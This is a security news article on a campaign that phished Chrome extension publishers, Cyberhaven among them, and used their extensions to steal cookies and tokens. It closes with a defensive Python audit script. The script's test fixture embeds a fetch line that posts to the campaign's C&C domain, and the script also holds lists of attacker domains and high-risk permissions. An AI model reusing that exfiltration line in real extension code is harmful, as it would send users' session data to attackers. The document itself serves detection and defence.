
Malicious Chrome Extensions Expose Over 600,000 Users to Data Theft

A recent attack campaign has targeted Chrome browser extensions, compromising at least 16 legitimate extensions and putting over 600,000 users at risk. The attackers infiltrated these extensions by targeting their publishers through phishing campaigns, injecting malicious code, and leveraging access permissions to exfiltrate sensitive data like cookies and user tokens.

Cyberhaven: The First Known Victim

The first confirmed victim was Cyberhaven, a cybersecurity firm. On December 24, 2024, an employee was deceived by a phishing email, which allowed attackers to publish a compromised version of the company's browser extension.

Details of the Cyberhaven Breach:

  • The malicious extension communicated with a command-and-control (C&C) server at cyberhavenext[.]pro.

  • It downloaded additional configuration files and exfiltrated sensitive data.

  • Cyberhaven disclosed the breach on December 27, revealing the sophisticated nature of the attack.

The Phishing Methodology

The phishing email impersonated Google Chrome Web Store Developer Support and warned recipients about potential policy violations. It urged them to grant permissions to a malicious OAuth application named "Privacy Policy Extension."

Key Steps in the Attack:

  1. Phishing emails created a false sense of urgency.

  2. Victims granted permissions to the malicious application.

  3. Attackers used these permissions to inject malicious code into legitimate extensions.

Additional Compromised Extensions

After Cyberhaven's breach became public, researchers identified other extensions compromised in the campaign. These include:

  • AI Assistant - ChatGPT and Gemini for Chrome

  • GPT 4 Summary with OpenAI

  • Reader Mode

  • Rewards Search Automator

  • Earny - Up to 20% Cash Back

  • Visual Effects for Google Meet

  • Parrot Talks

  • And many more.

This wide-scale attack indicates that Cyberhaven was only one of many targets in a coordinated campaign.

Technical Analysis of the Attack

The attack was multi-layered and sophisticated:

  • Phishing Entry Point: The campaign relied on convincing phishing emails.

  • Code Injection: Malicious code was inserted into legitimate extensions.

  • C&C Communication: The code connected to external servers to download additional payloads and steal data.

In the Cyberhaven breach, the malicious code specifically targeted Facebook account data, including business accounts, highlighting the attackers' focus on high-value targets.

Timeline and Scope

John Tuckner of Secure Annex traced the campaign back to at least April 2023. Domains such as nagofsg[.]com and sclpfybn[.]com were registered as early as 2022, suggesting the operation had been ongoing for years. Further analysis revealed interconnected malicious code across multiple extensions.

Organizational Response and Recommendations

Cyberhaven reported that the malicious extension was removed from the Chrome Web Store within 24 hours. However, removal from the store does not by itself resolve the threat: as long as the compromised version remains installed on users' devices, the attackers can continue to exploit it.

Recommendations for Mitigating Risks:

  1. Monitor Installed Extensions: Regularly audit browser extensions across endpoints.

  2. Restrict Permissions: Limit the installation of extensions to trusted sources.

  3. Employee Awareness: Educate staff on phishing risks and the dangers of granting permissions to unknown applications.

  4. Leverage Security Tools: Deploy tools to monitor and flag suspicious browser extension activity.
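
The audit in recommendation 1 and the C&C indicators from the technical analysis above can be combined into a simple endpoint check. The script below is an added example written for this article, not Cyberhaven's or Secure Annex's tooling. It assumes Chrome's on-disk layout of `<profile>/Extensions/<extension id>/<version>/manifest.json`, flags permissions that give an extension access to cookies and session tokens or to every site, and searches each extension's scripts for the three domains named in the article (plain or defanged). The two extension IDs and their files in `build_sample_profile` are constructed fixtures, not real extensions.

```python
"""Audit installed Chrome extensions for risky permissions and known C&C domains.

Added example for this article; assumes Chrome's layout
<profile>/Extensions/<id>/<version>/manifest.json.
"""
import json
import os
import re
import tempfile
from dataclasses import dataclass, field

# Domains named in the article (written there defanged as x[.]y).
IOC_DOMAINS = ("cyberhavenext.pro", "nagofsg.com", "sclpfybn.com")

# Permissions that expose cookies/tokens or grant access to every site.
HIGH_RISK_PERMISSIONS = {"cookies", "webRequest", "scripting", "<all_urls>"}

# Matches each IoC domain whether its dots are plain or defanged as "[.]".
IOC_PATTERN = re.compile(
    "|".join(re.escape(d).replace(r"\.", r"(?:\.|\[\.\])") for d in IOC_DOMAINS),
    re.IGNORECASE,
)


@dataclass
class Finding:
    ext_id: str
    version: str
    name: str
    risky_permissions: list = field(default_factory=list)
    ioc_hits: list = field(default_factory=list)  # (relative file, domain)

    @property
    def suspicious(self) -> bool:
        # A C&C reference is conclusive; risky permissions alone are a triage signal.
        return bool(self.ioc_hits)


def declared_permissions(manifest: dict) -> set:
    """API permissions plus MV3 host_permissions and content-script match patterns."""
    perms = set(manifest.get("permissions", []))
    perms.update(manifest.get("host_permissions", []))
    for script in manifest.get("content_scripts", []):
        perms.update(script.get("matches", []))
    return perms


def audit_version_dir(ext_id: str, version_dir: str) -> Finding:
    """Parse one installed version: manifest permissions and IoC strings in its files."""
    with open(os.path.join(version_dir, "manifest.json"), encoding="utf-8") as fh:
        manifest = json.load(fh)
    finding = Finding(ext_id, os.path.basename(version_dir), manifest.get("name", "?"))
    finding.risky_permissions = sorted(declared_permissions(manifest) & HIGH_RISK_PERMISSIONS)
    for root, _dirs, files in os.walk(version_dir):
        for name in files:
            if not name.endswith((".js", ".json", ".html")):
                continue
            path = os.path.join(root, name)
            with open(path, encoding="utf-8", errors="ignore") as fh:
                for match in IOC_PATTERN.finditer(fh.read()):
                    domain = match.group(0).replace("[.]", ".").lower()
                    finding.ioc_hits.append((os.path.relpath(path, version_dir), domain))
    return finding


def audit_profile(profile_dir: str) -> list:
    """Walk <profile>/Extensions/<id>/<version>/ and audit every installed version."""
    findings = []
    ext_root = os.path.join(profile_dir, "Extensions")
    if not os.path.isdir(ext_root):
        return findings
    for ext_id in sorted(os.listdir(ext_root)):
        for version in sorted(os.listdir(os.path.join(ext_root, ext_id))):
            vdir = os.path.join(ext_root, ext_id, version)
            if os.path.isfile(os.path.join(vdir, "manifest.json")):
                findings.append(audit_version_dir(ext_id, vdir))
    return findings


def build_sample_profile(profile_dir: str) -> None:
    """Constructed fixture: a benign extension and one mirroring the article's pattern
    (cookies + <all_urls> permissions, worker posting to the C&C domain). IDs are made up."""
    samples = {
        "abcdefghijklmnopabcdefghijklmnop": (
            {"manifest_version": 3, "name": "Benign Notes", "version": "1.0",
             "permissions": ["storage"]},
            "chrome.storage.local.set({ready: true});",
        ),
        "ponmlkjihgfedcbaponmlkjihgfedcba": (
            {"manifest_version": 3, "name": "Compromised Helper", "version": "24.10.4",
             "permissions": ["cookies", "storage"], "host_permissions": ["<all_urls>"],
             "background": {"service_worker": "worker.js"}},
            'fetch("https://cyberhavenext.pro/ai", {method: "POST"});',
        ),
    }
    for ext_id, (manifest, worker) in samples.items():
        vdir = os.path.join(profile_dir, "Extensions", ext_id, manifest["version"] + "_0")
        os.makedirs(vdir)
        with open(os.path.join(vdir, "manifest.json"), "w", encoding="utf-8") as fh:
            json.dump(manifest, fh)
        with open(os.path.join(vdir, "worker.js"), "w", encoding="utf-8") as fh:
            fh.write(worker)


def demo() -> list:
    """Build the fixture in a temporary directory and return the audit findings."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_profile(tmp)
        return audit_profile(tmp)


if __name__ == "__main__":
    for f in demo():
        status = "SUSPICIOUS" if f.suspicious else "ok"
        print(f"{status:10} {f.ext_id} {f.name} v{f.version} "
              f"perms={f.risky_permissions} ioc={f.ioc_hits}")
```

Point `audit_profile` at a real profile directory (for example `~/.config/google-chrome/Default` on Linux) to run it against actual endpoints; the IoC list is only the three domains this article names and would be extended from current threat intelligence. Because the compromised versions stay installed after the store listing is pulled, the version string in each finding is what tells you whether an endpoint still carries the bad build. For recommendation 2, Chrome's enterprise `ExtensionInstallAllowlist` / `ExtensionInstallBlocklist` / `ExtensionSettings` policies are the usual way to pin installations to approved IDs.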

Conclusion

This campaign serves as a stark reminder of the vulnerabilities posed by browser extensions. Often overlooked, extensions can become entry points for attackers to access sensitive data and compromise accounts.

Organizations must adopt proactive measures, including regular monitoring, restricted permissions, and employee training, to defend against similar threats in the future. The sophisticated and widespread nature of this attack highlights the need for vigilance and robust security practices.